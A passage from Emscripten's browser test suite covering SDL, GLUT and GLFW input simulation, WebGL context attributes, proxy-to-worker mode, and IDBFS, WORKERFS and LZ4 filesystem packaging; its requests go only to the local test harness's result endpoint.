self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL'], manual_reference=True, post_build=self.post_manual_reftest)
@no_chrome('see #7930')
@requires_graphics_hardware
def test_glgears_proxy(self):
# we modify the asm.js, this is a non-wasm test
self.btest('hello_world_gles_proxy.c', reference='gears.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-DSTATIC_GEARS=1', '-lGL', '-lglut', '-s', 'WASM=0'], manual_reference=True, post_build=self.post_manual_reftest)
# test noProxy option applied at runtime
# run normally (duplicates the above test, but verifies we can run outside of the btest harness)
self.run_browser('test.html', None, ['/report_result?0'])
# run with noProxy
self.run_browser('test.html?noProxy', None, ['/report_result?0'])
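# copy() clones test.html/test.js under a new name, applying the given transforms; we
# use it below to inject an early exit into _main on either the main thread or the
# worker, to check that the expected side actually did the work.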
def copy(to, js_mod, html_mod=lambda x: x):
create_test_file(to + '.html', html_mod(open('test.html').read().replace('test.js', to + '.js')))
create_test_file(to + '.js', js_mod(open('test.js').read()))
# run with noProxy, but make main thread fail
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('two.html?noProxy', None, ['/report_result?999'])
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original))
self.run_browser('two.html', None, ['/report_result?0']) # this is still cool
# run without noProxy, so proxy, but make worker fail
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('three.html', None, ['/report_result?999'])
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original))
self.run_browser('three.html?noProxy', None, ['/report_result?0']) # this is still cool
@requires_graphics_hardware
def test_glgears_proxy_jstarget(self):
# test .js target with --proxy-to-worker; emits 2 js files, client and worker
self.compile_btest([path_from_root('tests', 'hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'GL_TESTING=1', '-lGL', '-lglut'])
shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
# N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer.
# See https://github.com/emscripten-core/emscripten/issues/4069.
create_test_file('flag_0.js', '''
Module['arguments'] = ['-0'];
''')
self.btest('sdl_canvas_alpha.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_alpha.png', reference_slack=12)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js', '-lSDL', '-lGL'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
def test_sdl_key(self):
for delay in [0, 1]:
for defines in [
[],
['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
]:
for emterps in [
[],
['-DTEST_SLEEP', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-s', 'ASSERTIONS=1', '-s', "SAFE_HEAP=1"]
]:
print(delay, defines, emterps)
if emterps and self.is_wasm_backend():
return self.skipTest('no emterpretify with wasm backend')
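# The generated pre.js below dispatches the key events inline when delay == 0, and
# wraps each dispatch in setTimeout(..., 1) when delay == 1, so the asynchronous
# event path is exercised as well.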
create_test_file('pre.js', '''
function keydown(c) {
%s
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
create_test_file('sdl_key.c', self.with_report_result(open(path_from_root('tests', 'sdl_key.c')).read()))
self.compile_btest(['sdl_key.c', '-o', 'page.html'] + defines + emterps + ['--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main']''', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
create_test_file('pre.js', '''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_test_file('test.html', html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'], manual_reference=True, post_build=post)
def test_canvas_focus(self):
self.btest('canvas_focus.c', '1')
def test_keydown_preventdefault_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keypress(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function sendKey(c) {
// Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
sendKey(65);
// Send backspace. Keypress should not be sent over as default handling of
// the Keydown event should be prevented.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_test_file('test.html', html)
self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-s', '''EXPORTED_FUNCTIONS=['_main']'''], manual_reference=True, post_build=post)
def test_sdl_text(self):
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
create_test_file('sdl_text.c', self.with_report_result(open(path_from_root('tests', 'sdl_text.c')).read()))
self.compile_btest(['sdl_text.c', '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('sdl_mouse.c', self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
self.compile_btest(['sdl_mouse.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
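# Same as test_sdl_mouse, but the events are dispatched with raw page coordinates
# (no canvas offset added) and the canvas is absolutely positioned inside an offset
# container, so SDL has to account for the canvas position itself.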
def test_sdl_mouse_offsets(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
create_test_file('sdl_mouse.c', self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
self.compile_btest(['sdl_mouse.c', '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify', '0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
self.btest('glut_touchevents.c', '1', args=['-lglut'])
def test_glut_wheelevents(self):
self.btest('glut_wheelevents.c', '1', args=['-lglut'])
@requires_graphics_hardware
def test_glut_glutget_no_antialias(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_graphics_hardware
def test_glut_glutget(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
create_test_file('sdl_joystick.c', self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
self.compile_btest(['sdl_joystick.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
create_test_file('sdl_joystick.c', self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
self.compile_btest(['sdl_joystick.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_glfw_joystick(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
var gamepad = {
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
};
gamepads.push(gamepad)
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
// Dispatch the event (required for the glfw joystick test; not used in the SDL tests)
var event = new Event('gamepadconnected');
event.gamepad = gamepad;
window.dispatchEvent(event);
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
create_test_file('test_glfw_joystick.c', self.with_report_result(open(path_from_root('tests', 'test_glfw_joystick.c')).read()))
self.compile_btest(['test_glfw_joystick.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-s', 'USE_GLFW=3'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_webgl_context_attributes(self):
# JavaScript code to check support for the attributes we want to test in the WebGL implementation
# (request the attribute, create a context and check its value afterwards in the context attributes).
# Tests still succeed when an attribute is not supported.
create_test_file('check_webgl_attributes_support.js', '''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {alpha: true});
attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
# Copy common code file to temporary directory
filepath = path_from_root('tests/test_webgl_context_attributes_common.c')
temp_filepath = os.path.join(self.get_dir(), os.path.basename(filepath))
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl2.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-s', 'USE_SDL=2', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW'])
# perform tests with attributes deactivated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW'])
# Test that -s GL_PREINITIALIZED_CONTEXT=1 works and allows user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context.
@requires_graphics_hardware
def test_preinitialized_webgl_context(self):
self.btest('preinitialized_webgl_context.cpp', '5', args=['-s', 'GL_PREINITIALIZED_CONTEXT=1', '--shell-file', path_from_root('tests/preinitialized_webgl_context.html')])
@requires_threads
def test_emscripten_get_now(self):
for args in [[], ['-s', 'USE_PTHREADS=1'], ['-s', 'ENVIRONMENT=web', '-O2', '--closure', '1']]:
self.btest('emscripten_get_now.cpp', '1', args=args)
def test_write_file_in_environment_web(self):
self.btest('write_file.cpp', '0', args=['-s', 'ENVIRONMENT=web', '-Os', '--closure', '1'])
@unittest.skip('Skipping due to https://github.com/emscripten-core/emscripten/issues/2770')
def test_fflush(self):
self.btest('test_fflush.cpp', '0', args=['--shell-file', path_from_root('tests', 'test_fflush.html')])
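# file_db.cpp persists `secret` on the first (-DFIRST) run; the later runs must read
# the same value back across separate page loads, even when a different moar.txt is
# preloaded over it (see the comment below).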
def test_file_db(self):
secret = str(time.time())
create_test_file('moar.txt', secret)
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret, args=['-s', 'FORCE_FILESYSTEM=1'])
shutil.copyfile('test.html', 'second.html')
create_test_file('moar.txt', 'aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
for extra in [[], ['-DEXTRA_WORK']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']'''])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']'''] + extra)
@no_wasm_backend('emterpretify')
def test_fs_idbfs_fsync(self):
# sync from persisted state into memory before main()
create_test_file('pre.js', '''
Module.preRun = function() {
addRunDependency('syncfs');
FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
args = ['--pre-js', 'pre.js', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-lidbfs.js', '-s', 'EXIT_RUNTIME=1']
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']'''])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']'''])
@no_wasm_backend('emterpretify')
def test_fs_memfs_fsync(self):
args = ['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-s', 'EXIT_RUNTIME=1']
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_memfs_fsync.c'), '1', force_c=True, args=args + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main']'''])
def test_fs_workerfs_read(self):
secret = 'a' * 10
secret2 = 'b' * 10
create_test_file('pre.js', '''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
self.btest(path_from_root('tests', 'fs', 'test_workerfs_read.c'), '1', force_c=True, args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker'])
def test_fs_workerfs_package(self):
create_test_file('file1.txt', 'first')
if not os.path.exists('sub'):
os.makedirs('sub')
open(os.path.join('sub', 'file2.txt'), 'w').write('second')
run_process([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', os.path.join('sub', 'file2.txt'), '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker'])
def test_fs_lz4fs_package(self):
# generate data
self.clear()
os.mkdir('subdir')
create_test_file('file1.txt', '0123456789' * (1024 * 128))
open(os.path.join('subdir', 'file2.txt'), 'w').write('1234567890' * (1024 * 128))
random_data = bytearray(random.randint(0, 255) for x in range(1024 * 128 * 10 + 1))
random_data[17] = ord('X')
open('file3.txt', 'wb').write(random_data)
# compress in emcc; -s LZ4=1 tells emcc to pass the option on to the file packager
print('emcc-normal')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'], timeout=60)
assert os.path.getsize('file1.txt') + os.path.getsize(os.path.join('subdir', 'file2.txt')) + os.path.getsize('file3.txt') == 3 * 1024 * 128 * 10 + 1
assert os.path.getsize('test.data') < (3 * 1024 * 128 * 10) / 2 # over half is gone
print(' emcc-opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'], timeout=60)
# compress in the file packager, on the server. the client receives compressed data and can just use it. this is typical usage
print('normal')
out = subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1'], timeout=60)
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2'], timeout=60)
# load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended
print('manual')
subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1'], timeout=60)
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2'], timeout=60)
print(' opts+closure')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2', '--closure', '1', '-g1'], timeout=60)
'''# non-lz4 for comparison
try:
os.mkdir('files')
except:
pass
shutil.copyfile('file1.txt', os.path.join('files', 'file1.txt'))
shutil.copyfile('file2.txt', os.path.join('files', 'file2.txt'))
shutil.copyfile('file3.txt', os.path.join('files', 'file3.txt'))
out = subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'], timeout=60)'''
def test_separate_metadata_later(self):
# see issue #6654 - we need to handle separate-metadata both when we run before
# the main program, and when we are run later
create_test_file('data.dat', ' ')
run_process([PYTHON, FILE_PACKAGER, 'more.data', '--preload', 'data.dat', '--separate-metadata', '--js-output=more.js'])
self.btest(os.path.join('browser', 'separate_metadata_later.cpp'), '1', args=['-s', 'FORCE_FILESYSTEM=1'])
def test_idbstore(self):
secret = str(time.time())
for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
self.clear()
self.btest(path_from_root('tests', 'idbstore.c'), str(stage), force_c=True, args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
@no_wasm_backend('emterpretify')
def test_idbstore_sync(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '--memory-init-file', '1', '-O3', '-g2'])
@no_wasm_backend('emterpretify')
def test_idbstore_sync_worker(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync_worker.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-s', 'TOTAL_MEMORY=80MB'])
def test_force_exit(self):
self.btest('force_exit.c', force_c=True, expected='17', args=['-s', 'EXIT_RUNTIME=1'])
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_test_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_canvas_size(self):
self.btest('sdl_canvas_size.c', expected='1',
args=['-O2', '--minify', '0', '--shell-file',
path_from_root('tests', 'sdl_canvas_size.html'), '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
create_test_file('sdl_gl_read.c', self.with_report_result(open(path_from_root('tests', 'sdl_gl_read.c')).read()))
self.compile_btest(['sdl_gl_read.c', '-o', 'something.html', '-lSDL', '-lGL'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-s', 'FULL_ES3=1', '-lSDL', '-lGL'],
